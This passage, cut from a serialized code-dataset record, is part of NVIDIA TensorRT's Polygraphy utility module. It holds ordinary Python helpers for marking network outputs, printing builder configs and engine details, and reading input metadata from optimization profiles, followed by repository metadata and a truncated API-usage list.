if hasattr(trt.LayerType, attr)]\n LOOP_END_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_END_NAMES if hasattr(trt.LayerType, attr)]\n EXCLUDE_LAYERS = [trt.LayerType.SHAPE, trt.LayerType.CONSTANT]\n outputs = []\n in_loop = False\n for layer in network:\n if layer.type in LOOP_START_LAYERS:\n G_LOGGER.warning(\n \"Loop detected. Please ensure the network is topologically sorted so that layers within \"\n \"the loop body are not marked as network outputs in layerwise mode\",\n mode=LogMode.ONCE,\n )\n in_loop = True\n elif layer.type in LOOP_END_LAYERS:\n in_loop = False\n\n should_mark_layer = not in_loop and layer.type not in EXCLUDE_LAYERS\n if should_mark_layer:\n for index in range(layer.num_outputs):\n tensor = layer.get_output(index)\n if tensor is not None:\n outputs.append(tensor.name)\n\n G_LOGGER.verbose(f\"Marking {len(outputs)} tensors as outputs\")\n mark_outputs(network, outputs)\n\n\ndef unmark_outputs(network, outputs):\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for name in outputs:\n tensor = tensor_map[name]\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n\ndef str_from_config(config):\n # Check the default device type so that we can trigger this from the tests.\n # On non-DLA platforms, config.DLA_core can never be set to anything other than -1,\n # but default_device_type can be set to DLA..\n using_dla = config.DLA_core >= 0 or config.default_device_type == trt.DeviceType.DLA\n\n lines = []\n\n def str_from_list(lst):\n return \"[\" + \", \".join(lst) + \"]\"\n\n def add_line(title, line):\n lines.append((f\"{title:{22}} | \" + line).strip())\n\n def get_enabled_enum_vals(EnumType, is_enabled):\n # is_enabled is a Callable[[enum_val], bool] which reports whether to include the enum value.\n return [name for name, enum_val in EnumType.__members__.items() if is_enabled(enum_val)]\n\n # Flags\n enabled_builder_flags = get_enabled_enum_vals(trt.BuilderFlag, lambda flag: config.get_flag(flag))\n add_line(\"Flags\", f\"{str_from_list(enabled_builder_flags)}\")\n\n # Engine Capability\n with contextlib.suppress(AttributeError):\n add_line(\"Engine Capability\", str(config.engine_capability))\n\n # Memory Pools\n with contextlib.suppress(AttributeError):\n mem_pool_limits = [\n f\"{name}: {config.get_memory_pool_limit(pool_type) / float(1<<20):.2f} MiB\"\n for name, pool_type in trt.MemoryPoolType.__members__.items()\n # Only show DLA memory pools when DLA is in use\n if (not name.startswith(\"DLA\") or using_dla)\n ]\n add_line(\"Memory Pools\", f\"{str_from_list(mem_pool_limits)}\")\n\n # Tactic Sources\n with contextlib.suppress(AttributeError):\n source_vals = get_enabled_enum_vals(trt.TacticSource, lambda val: (1 << int(val)) & config.get_tactic_sources())\n add_line(\"Tactic Sources\", f\"{str_from_list(source_vals)}\")\n\n # DLA\n if using_dla:\n add_line(\"DLA\", f\"Default Device Type: {config.default_device_type}, Core: {config.DLA_core}\")\n\n # Profiling Verbosity\n with contextlib.suppress(AttributeError):\n add_line(\"Profiling Verbosity\", f\"{config.profiling_verbosity}\")\n\n # Optimization Profiles\n if config.num_optimization_profiles > 1: # Not particularly interesting unless there are multiple.\n add_line(\"Optimization Profiles\", f\"{config.num_optimization_profiles} profile(s)\")\n\n # Preview Features\n with contextlib.suppress(AttributeError):\n feature_vals = get_enabled_enum_vals(trt.PreviewFeature, lambda val: config.get_preview_feature(val))\n if feature_vals:\n add_line(\"Preview Features\", f\"{str_from_list(feature_vals)}\")\n\n # Calibrator\n if config.int8_calibrator:\n add_line(\"Calibrator\", f\"{config.int8_calibrator}\")\n\n return \"\\n\".join(lines)\n\n\ndef check_profile(profile):\n if not bool(profile):\n G_LOGGER.critical(f\"Profile is not valid, please provide profile data.\\nNote: profile was: {profile}\")\n return profile\n\n\ndef str_from_tensor(tensor, is_shape_tensor):\n ret = \"Input \"\n if is_shape_tensor:\n ret += \"shape-tensor\"\n else:\n ret += \"tensor\"\n ret += f\": {tensor.name} (dtype={tensor.dtype}, shape={tensor.shape})\"\n return ret\n\n\n# Note: When `force_opt_shapes=True` this method is treated as being specific to calibration.\ndef get_input_metadata_from_network(network, profile, force_opt_shapes=None):\n \"\"\"\n Returns metadata about the inputs of a network, referring to the values\n set in a profile for dynamic shapes.\n\n Args:\n network (trt.INetworkDefinition):\n The network the profile applies to.\n profile (trt.IOptimizationProfile):\n The profile from which to retrieve input metadata.\n\n force_opt_shapes (bool):\n Whether to ignore the minimum and maximum shapes in the profile\n and always use OPT shapes.\n Defaults to False.\n\n Returns:\n TensorMetadata:\n A mapping of input names to their types and shapes.\n Shapes are retrieved from the OPT values in the profile.\n\n Raises:\n PolygraphyException:\n If the network has dynamic shapes or shape tensor inputs but no profile\n was provided.\n \"\"\"\n force_opt_shapes = util.default(force_opt_shapes, False)\n\n input_metadata = TensorMetadata()\n for index in range(network.num_inputs):\n tensor = network.get_input(index)\n # Only access the profile if we actually need to.\n # This way, this method works with static networks even without a profile set.\n min_shape = None\n max_shape = None\n opt_shape = tensor.shape\n if tensor.is_shape_tensor or util.is_shape_dynamic(tensor.shape):\n if tensor.is_shape_tensor:\n min_shape, opt_shape, max_shape = profile.get_shape_input(tensor.name)\n else:\n min_shape, opt_shape, max_shape = profile.get_shape(tensor.name)\n\n if force_opt_shapes and tuple(min_shape) != tuple(max_shape):\n G_LOGGER.warning(\n \"TensorRT does not currently support using dynamic shapes during calibration. \"\n \"The `OPT` shapes from the calibration profile will be used for tensors with dynamic shapes. \"\n \"Calibration data is expected to conform to those shapes. \",\n mode=LogMode.ONCE,\n )\n\n input_metadata.add(\n name=tensor.name,\n dtype=np_dtype_from_trt(tensor.dtype),\n shape=opt_shape if force_opt_shapes else tensor.shape,\n min_shape=None if force_opt_shapes else min_shape,\n max_shape=None if force_opt_shapes else max_shape,\n )\n return input_metadata\n\n\n# calib_profile parameter is used to bypass `get_calibration_profile()` to make this work on TRT 7.0 and older.\ndef try_setup_polygraphy_calibrator(config, network, calib_profile=None):\n \"\"\"\n Tries to call setup methods specific to Polygraphy calibrators.\n Returns early if there is no calibrator or if it is not a Polygraphy calibrator.\n \"\"\"\n calibrator = config.int8_calibrator\n if calibrator is None or not (\n hasattr(calibrator, \"is_polygraphy_calibrator\") and calibrator.is_polygraphy_calibrator\n ):\n # No calibrator or not a Polygraphy calibrator.\n return\n\n if calib_profile is None:\n try:\n calib_profile = config.get_calibration_profile()\n except AttributeError:\n G_LOGGER.extra_verbose(\"Cannot get calibration profile on TensorRT 7.0 and older.\")\n # Return early so we don't emit extraneous warnings on TRT 7.0 and older.\n return\n\n try:\n # TensorRT does not currently support shapes other than the OPT shape.\n input_metadata = get_input_metadata_from_network(network, calib_profile, force_opt_shapes=True)\n except PolygraphyException as err:\n G_LOGGER.warning(\n \"Could not determine input_metadata to provide to the calibrator because no calibration profile is set. \"\n \"Please either set a calibration profile in the config or call `calibrator.set_input_metadata()` manually. \"\n f\"\\nNote: Error was:\\n{err}\",\n mode=LogMode.ONCE,\n )\n else:\n calibrator.set_input_metadata(input_metadata)\n\n\ndef get_hwc_shape_from_chw(shape, strides):\n # The relative size (descending sorted order) of the strides should give the permutation to convert the shape\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n return tuple([shape[i] for i in perm])\n\n\ndef get_chw_shape_from_hwc(shape, strides):\n perm = sorted(range(len(strides)), key=strides.__getitem__, reverse=True)\n inv_perm = sorted(range(len(perm)), key=perm.__getitem__)\n return tuple([shape[i] for i in inv_perm])\n\n\ndef get_metadata_from_engine(engine, context, mode):\n meta = TensorMetadata()\n for idx in range(engine.num_io_tensors):\n name = engine.get_tensor_name(idx)\n if engine.get_tensor_mode(name) != mode:\n continue\n\n shape = engine.get_tensor_shape(name)\n # If the input format is HWC, make sure the input is shaped accordingly\n if engine.get_tensor_format(name) == trt.TensorFormat.HWC:\n shape = get_hwc_shape_from_chw(shape, context.get_tensor_strides(name))\n\n meta.add(name=name, dtype=np_dtype_from_trt(engine.get_tensor_dtype(name)), shape=shape)\n return meta\n\n\ndef str_from_engine(engine, context, show_layers=None, show_attrs=None):\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n\n if _should_use_v3_api():\n num_io_tensors = engine.num_io_tensors\n else:\n num_io_tensors = get_bindings_per_profile(engine)\n\n engine_str = f\"Name: {engine.name} | {'Refittable ' if engine.refittable else ''}{'Implicit' if hasattr(engine, 'has_implicit_batch_dimension') and engine.has_implicit_batch_dimension else 'Explicit'} Batch Engine\\n\"\n engine_str += \"\\n\"\n\n # Show metadata for the first profile (i.e. the dynamic shapes)\n if _should_use_v3_api():\n input_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.INPUT)\n output_metadata = get_metadata_from_engine(engine, context, mode=trt.TensorIOMode.OUTPUT)\n else:\n input_metadata = get_input_metadata_from_engine(engine, 0, num_io_tensors)\n output_metadata = get_output_metadata_from_engine(engine, 0, num_io_tensors)\n\n engine_str += f\"---- {len(input_metadata)} Engine Input(s) ----\\n{input_metadata}\\n\\n\"\n engine_str += f\"---- {len(output_metadata)} Engine Output(s) ----\\n{output_metadata}\\n\\n\"\n\n engine_str += f\"---- Memory ----\\nDevice Memory: {engine.device_memory_size} bytes\\n\\n\"\n\n engine_str += f\"---- {engine.num_optimization_profiles} Profile(s) ({num_io_tensors} Tensor(s) Each) ----\\n\"\n for profile_index in range(engine.num_optimization_profiles):\n engine_str += f\"- Profile: {profile_index}\\n\"\n\n if _should_use_v3_api():\n max_width = max([len(engine.get_tensor_name(idx)) for idx in range(engine.num_io_tensors)]) + 8\n else:\n max_width = max([len(binding) for binding in engine]) + 8\n\n for idx in range(num_io_tensors):\n if _should_use_v3_api():\n name = engine.get_tensor_name(idx)\n binding_type = \" (Input)\" if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT else \"(Output)\"\n engine_str += util.indent_block(f\"Tensor: {name:<{max_width}} {binding_type}, Index: {idx}\")\n\n if engine.get_tensor_mode(name) == trt.TensorIOMode.INPUT:\n min_shape, opt_shape, max_shape = engine.get_tensor_profile_shape(name, profile_index)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_tensor_shape(name)}\\n\"\n else:\n binding = profile_index * num_io_tensors + idx\n name = f\"[Name: {engine.get_binding_name(binding)}]\"\n binding_type = \"(Input) \" if engine.binding_is_input(binding) else \"(Output)\"\n engine_str += util.indent_block(f\"Binding Index: {binding} {binding_type} {name:<{max_width}}\")\n\n if engine.binding_is_input(binding):\n if engine.is_shape_binding(binding):\n min_shape, opt_shape, max_shape = engine.get_profile_shape_input(profile_index, binding)\n else:\n min_shape, opt_shape, max_shape = engine.get_profile_shape(profile_index, binding)\n engine_str += f\" | Shapes: min={min_shape}, opt={opt_shape}, max={max_shape}\\n\"\n else:\n engine_str += f\" | Shape: {engine.get_binding_shape(binding)}\\n\"\n engine_str += \"\\n\"\n\n layers_per_profile = engine.num_layers // engine.num_optimization_profiles\n engine_str += (\n f\"---- {layers_per_profile} Layer(s){' Per Profile' if engine.num_optimization_profiles > 1 else ''} ----\\n\"\n )\n if show_layers:\n try:\n inspector = engine.create_engine_inspector()\n except AttributeError:\n G_LOGGER.warning(\n f\"Cannot show layer information because IEngineInspector is not available in this version of TensorRT ({trt.__version__})\"\n )\n else:\n for profile_idx in range(engine.num_optimization_profiles):\n indent_level = 0\n if engine.num_optimization_profiles >= 1:\n indent_level = 1\n engine_str += f\"- Profile: {profile_idx}\\n\"\n\n offset = profile_idx * layers_per_profile\n for index in range(layers_per_profile):\n layer_info = json.loads(\n inspector.get_layer_information(offset + index, trt.LayerInformationFormat.JSON)\n )\n\n op = \"Unknown\"\n input_names, input_meta = [], TensorMetadata()\n output_names, output_meta = [], TensorMetadata()\n origin = \"Unknown\"\n tactic = \"Unknown\"\n if engine.profiling_verbosity == trt.ProfilingVerbosity.DETAILED:\n name = layer_info.get(\"Name\", \"Unknown\")\n op = layer_info.get(\"LayerType\", \"Unknown\")\n\n def names_meta_from_inspector(key):\n names = []\n meta = TensorMetadata()\n info = layer_info.get(key)\n if info is None:\n return meta\n for elem in info:\n names.append(elem[\"Name\"])\n meta.add(name=elem[\"Name\"], dtype=None, shape=elem[\"Dimensions\"])\n return names, meta\n\n input_names, input_meta = names_meta_from_inspector(\"Inputs\")\n output_names, output_meta = names_meta_from_inspector(\"Outputs\")\n origin = layer_info.get(\"Origin\", \"Unknown\")\n tactic = layer_info.get(\"TacticValue\", \"Unknown\")\n else:\n G_LOGGER.warning(\n f\"This engine was created with a profiling verbosity of: {engine.profiling_verbosity}. Some layer information may be missing. Try setting a higher profiling verbosity to see more detailed layer information. \",\n mode=LogMode.ONCE,\n )\n name = layer_info\n\n engine_str += (\n util.indent_block(\n util.str_from_layer(\n \"Layer\", index, name, op, input_names, input_meta, output_names, output_meta\n ),\n indent_level,\n )\n + \"\\n\"\n )\n\n if show_attrs:\n engine_str += util.indent_block(\"---- Attributes ----\", indent_level + 1) + \"\\n\"\n engine_str += util.indent_block(f\"Origin = {origin}\", indent_level + 1) + \"\\n\"\n engine_str += util.indent_block(f\"Tactic = {tactic}\", indent_level + 1) + \"\\n\"\n\n engine_str += \"\\n\"\n\n return util.indent_block(engine_str, level=0)\n\n\n# V2 APIs\ndef add_binding_to_metadata(engine, binding, metadata, name_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n # name_binding always comes from profile 0, since that's where we\n # get all binding names in the runner\n metadata.add(\n name=engine[name_binding],\n dtype=np_dtype_from_trt(engine.get_binding_dtype(binding)),\n shape=list(engine.get_binding_shape(binding)),\n )\n\n\ndef get_input_metadata_from_engine(engine, start_binding, end_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n inputs = TensorMetadata()\n for index, binding in enumerate(range(start_binding, end_binding)):\n if engine.binding_is_input(binding):\n add_binding_to_metadata(engine, binding, inputs, name_binding=index)\n return inputs\n\n\ndef get_output_metadata_from_engine(engine, start_binding, end_binding):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n outputs = TensorMetadata()\n for index, binding in enumerate(range(start_binding, end_binding)):\n if not engine.binding_is_input(binding):\n add_binding_to_metadata(engine, binding, outputs, name_binding=index)\n return outputs\n\n\ndef get_bindings_per_profile(engine):\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n return engine.num_bindings // engine.num_optimization_profiles\n\n\ndef get_active_profile_bindings(context):\n \"\"\"\n Gets the start and end binding indices for the active optimization profile.\n\n Args:\n engine (trt.ICudaEngine): The engine in question.\n context (trt.IExecutionContext): The context where the profile is currently set.\n\n Returns:\n Tuple[int, int]: The start and end bindings indices, in that order\n \"\"\"\n if _should_use_v3_api():\n G_LOGGER.internal_error(\"This function should not be called when using the V3 API\")\n\n active_profile = context.active_optimization_profile\n if active_profile < 0:\n G_LOGGER.critical(\n f\"Cannot determine profile bindings since the optimization profile for this context is set to: {active_profile}\"\n )\n\n bindings_per_profile = get_bindings_per_profile(context.engine)\n\n start_binding = bindings_per_profile * active_profile\n end_binding = start_binding + bindings_per_profile\n\n G_LOGGER.ultra_verbose(\n f\"Total # of Profiles: {context.engine.num_optimization_profiles}, Bindings Per Profile: {bindings_per_profile}, \"\n f\"Active Profile: {active_profile}, Start Binding: {start_binding}, End Binding: {end_binding}\"\n )\n return start_binding, end_binding\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "tools/Polygraphy/polygraphy/backend/trt/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 32219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "polygraphy.mod.lazy_import", "line_number": 11, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 11, "usage_type": "name"}, {"api_name": "polygraphy.mod.lazy_import", "line_number": 12, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 12, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 29, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 29, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 39, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 39, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 40, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 40, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 42, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 42, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 43, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 43, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 44, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 44, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.super_verbose", "line_number": 45, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 45, "usage_type": "name"}, {"api_name": "os.kill", "line_number": 51, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 51, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "polygraphy.mod.export", "line_number": 18, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 18, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 61, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 61, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.backtrace", "line_number": 65, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 65, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 66, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 66, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.error", "line_number": 72, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 72, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 73, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 73, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 76, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 76, "usage_type": "name"}, {"api_name": "polygraphy.config.INTERNAL_CORRECTNESS_CHECKS", "line_number": 87, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 87, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 88, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 88, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 145, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 145, "usage_type": "name"}, {"api_name": "polygraphy.mod.version", "line_number": 146, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 146, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 148, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 148, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 150, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 150, "usage_type": "name"}, {"api_name": "polygraphy.mod.autoinstall", "line_number": 155, "usage_type": "call"}, {"api_name": "polygraphy.mod", "line_number": 155, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 162, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 172, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 182, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 193, "usage_type": "call"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 205, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 205, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 251, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 251, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 252, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 252, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 253, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 253, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 276, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 276, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbosity", "line_number": 278, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 278, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 284, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 284, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 287, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 287, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 309, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 309, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 312, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 312, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.ultra_verbose", "line_number": 322, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 322, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 337, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 337, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 340, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 340, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.verbose", "line_number": 353, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 353, "usage_type": "name"}, {"api_name": "polygraphy.util.unique_list", "line_number": 358, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 358, "usage_type": "name"}, {"api_name": "polygraphy.util.check_sequence_contains", "line_number": 361, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 361, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 375, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 375, "usage_type": "attribute"}, {"api_name": "polygraphy.config.get_flag", "line_number": 390, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 390, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 394, "usage_type": "call"}, {"api_name": "polygraphy.config.engine_capability", "line_number": 395, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 395, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 398, "usage_type": "call"}, {"api_name": "polygraphy.config.get_memory_pool_limit", "line_number": 400, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 400, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 408, "usage_type": "call"}, {"api_name": "polygraphy.config.get_tactic_sources", "line_number": 409, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 409, "usage_type": "name"}, {"api_name": "polygraphy.config.default_device_type", "line_number": 414, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 414, "usage_type": "name"}, {"api_name": "polygraphy.config.DLA_core", "line_number": 414, "usage_type": "attribute"}, {"api_name": "contextlib.suppress", "line_number": 417, "usage_type": "call"}, {"api_name": "polygraphy.config.profiling_verbosity", "line_number": 418, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 418, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 421, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 421, "usage_type": "name"}, {"api_name": "polygraphy.config.num_optimization_profiles", "line_number": 422, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 422, "usage_type": "name"}, {"api_name": "contextlib.suppress", "line_number": 425, "usage_type": "call"}, {"api_name": "polygraphy.config.get_preview_feature", "line_number": 426, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 426, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 431, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 431, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 432, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 432, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.critical", "line_number": 439, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 439, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 480, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 480, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 482, "usage_type": "call"}, {"api_name": "polygraphy.util.is_shape_dynamic", "line_number": 490, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 490, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 497, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 497, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 501, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 501, "usage_type": "name"}, {"api_name": "polygraphy.config.int8_calibrator", "line_number": 520, "usage_type": "attribute"}, {"api_name": "polygraphy.config", "line_number": 520, "usage_type": "name"}, {"api_name": "polygraphy.config.get_calibration_profile", "line_number": 529, "usage_type": "call"}, {"api_name": "polygraphy.config", "line_number": 529, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.extra_verbose", "line_number": 531, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 531, "usage_type": "name"}, {"api_name": "polygraphy.exception.PolygraphyException", "line_number": 538, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 539, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 539, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 543, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 543, "usage_type": "name"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 562, "usage_type": "call"}, {"api_name": "polygraphy.util.default", "line_number": 578, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 578, "usage_type": "name"}, {"api_name": "polygraphy.util.default", "line_number": 579, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 579, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 615, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 615, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 626, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 626, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 646, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 646, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 658, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 663, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 664, "usage_type": "call"}, {"api_name": "polygraphy.common.TensorMetadata", "line_number": 673, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER.warning", "line_number": 687, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 687, "usage_type": "name"}, {"api_name": "polygraphy.logger.LogMode.ONCE", "line_number": 689, "usage_type": "attribute"}, {"api_name": "polygraphy.logger.LogMode", "line_number": 689, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 694, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 694, "usage_type": "name"}, {"api_name": "polygraphy.util.str_from_layer", "line_number": 695, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 695, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 704, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 704, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 705, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 705, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 706, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 706, "usage_type": "name"}, {"api_name": "polygraphy.util.indent_block", "line_number": 710, "usage_type": "call"}, {"api_name": "polygraphy.util", "line_number": 710, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 716, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 716, "usage_type": "name"}, {"api_name": "polygraphy.logger.G_LOGGER.internal_error", "line_number": 729, "usage_type": "call"}, {"api_name": "polygraphy.logger.G_LOGGER", "line_number": 729, "usage_type": "name"}, {"api_name": 